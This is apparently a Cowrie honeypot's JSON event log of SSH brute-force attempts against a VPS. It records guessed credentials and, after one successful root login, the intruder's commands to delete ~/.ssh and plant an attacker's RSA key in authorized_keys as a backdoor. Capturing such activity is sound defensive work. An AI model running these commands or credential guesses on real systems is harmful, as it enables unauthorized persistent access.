{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.100222Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40048,"dst_ip":"1.2.3.4","dst_port":22,"session":"12272c64db58","protocol":"ssh","message":"New connection: 212.227.235.229:40048 (1.2.3.4:22) [session: 12272c64db58]","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.404196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.404902Z","src_ip":"212.227.235.229","session":"12272c64db58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.710336Z","src_ip":"212.227.235.229","session":"12272c64db58"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:04:59.789723Z","src_ip":"212.227.235.229","session":"d402716b3223"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:01.025542Z","src_ip":"212.227.235.229","session":"d402716b3223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37980,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab82efcca0ed","protocol":"ssh","message":"New connection: 212.227.235.229:37980 (1.2.3.4:22) [session: ab82efcca0ed]","sensor":"my-vps","timestamp":"2025-09-08T23:05:01.262002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:01.288225Z","src_ip":"212.227.235.229","session":"ab82efcca0ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:01.372043Z","src_ip":"212.227.235.229","session":"12272c64db58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:01.527717Z","src_ip":"212.227.235.229","session":"ab82efcca0ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:02.532173Z","src_ip":"212.227.235.229","session":"ab82efcca0ed"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:02.680384Z","src_ip":"212.227.235.229","session":"12272c64db58"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:02.777373Z","src_ip":"212.227.235.229","session":"ab82efcca0ed"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:02.796006Z","src_ip":"212.227.235.229","session":"c7f64a856581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40062,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fb6bb844c28","protocol":"ssh","message":"New connection: 212.227.235.229:40062 (1.2.3.4:22) [session: 9fb6bb844c28]","sensor":"my-vps","timestamp":"2025-09-08T23:05:02.998938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:03.000106Z","src_ip":"212.227.235.229","session":"9fb6bb844c28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:03.318007Z","src_ip":"212.227.235.229","session":"9fb6bb844c28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49516,"dst_ip":"1.2.3.4","dst_port":22,"session":"97dc9b95c421","protocol":"ssh","message":"New connection: 212.227.235.229:49516 (1.2.3.4:22) [session: 97dc9b95c421]","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.266191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.267014Z","src_ip":"212.227.235.229","session":"97dc9b95c421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.591451Z","src_ip":"212.227.235.229","session":"97dc9b95c421"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.632868Z","src_ip":"212.227.235.229","session":"9fb6bb844c28"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.952838Z","src_ip":"212.227.235.229","session":"3e9b83d73357"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:04.953977Z","src_ip":"212.227.235.229","session":"9fb6bb844c28"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2@2025","message":"login attempt [test2/test2@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:05.927592Z","src_ip":"212.227.235.229","session":"97dc9b95c421"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:07.253432Z","src_ip":"212.227.235.229","session":"97dc9b95c421"}
{"eventid":"cowrie.session.closed","duration":10.1369047164917,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:07.488631Z","src_ip":"167.94.138.184","session":"b1bae20069e7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59460,"dst_ip":"1.2.3.4","dst_port":22,"session":"28f5f6811f21","protocol":"ssh","message":"New connection: 217.72.205.35:59460 (1.2.3.4:22) [session: 28f5f6811f21]","sensor":"my-vps","timestamp":"2025-09-08T23:05:11.022312Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:11.023353Z","src_ip":"217.72.205.35","session":"28f5f6811f21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54120,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b9a27e43451","protocol":"telnet","message":"New connection: 212.227.125.160:54120 (1.2.3.4:23) [session: 3b9a27e43451]","sensor":"my-vps","timestamp":"2025-09-08T23:05:21.792659Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52410,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a33522a40c7","protocol":"ssh","message":"New connection: 212.227.235.229:52410 (1.2.3.4:22) [session: 9a33522a40c7]","sensor":"my-vps","timestamp":"2025-09-08T23:05:22.701870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:22.702839Z","src_ip":"212.227.235.229","session":"9a33522a40c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:22.956161Z","src_ip":"212.227.235.229","session":"9a33522a40c7"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:24.011893Z","src_ip":"212.227.235.229","session":"9a33522a40c7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:25.269361Z","src_ip":"212.227.235.229","session":"9a33522a40c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49360,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b8bb9350fc0","protocol":"ssh","message":"New connection: 212.227.235.229:49360 (1.2.3.4:22) [session: 2b8bb9350fc0]","sensor":"my-vps","timestamp":"2025-09-08T23:05:25.876000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:25.876770Z","src_ip":"212.227.235.229","session":"2b8bb9350fc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:25.972031Z","src_ip":"212.227.235.229","session":"2b8bb9350fc0"}
{"eventid":"cowrie.login.failed","username":"svn","password":"changeme","message":"login attempt [svn/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:26.394776Z","src_ip":"212.227.235.229","session":"2b8bb9350fc0"}
{"eventid":"cowrie.session.closed","duration":5.000205039978027,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:26.792799Z","src_ip":"212.227.125.160","session":"3b9a27e43451"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56648,"dst_ip":"1.2.3.4","dst_port":22,"session":"2959dc6116b1","protocol":"ssh","message":"New connection: 212.227.235.229:56648 (1.2.3.4:22) [session: 2959dc6116b1]","sensor":"my-vps","timestamp":"2025-09-08T23:05:26.985487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:26.987027Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.085711Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.492369Z","src_ip":"212.227.235.229","session":"2b8bb9350fc0"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq1234567890","message":"login attempt [root/Qq1234567890] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.520752Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:27.778766Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.779473Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.780502Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:27.880291Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:05:28.139941Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.140655Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.241122Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.242027Z","src_ip":"212.227.235.229","session":"2959dc6116b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56650,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f36ce400353","protocol":"ssh","message":"New connection: 212.227.235.229:56650 (1.2.3.4:22) [session: 5f36ce400353]","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.339113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.339730Z","src_ip":"212.227.235.229","session":"5f36ce400353"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.438189Z","src_ip":"212.227.235.229","session":"5f36ce400353"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:05:28.875365Z","src_ip":"212.227.235.229","session":"5f36ce400353"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:05:29.976833Z","src_ip":"212.227.235.229","session":"5f36ce400353"}
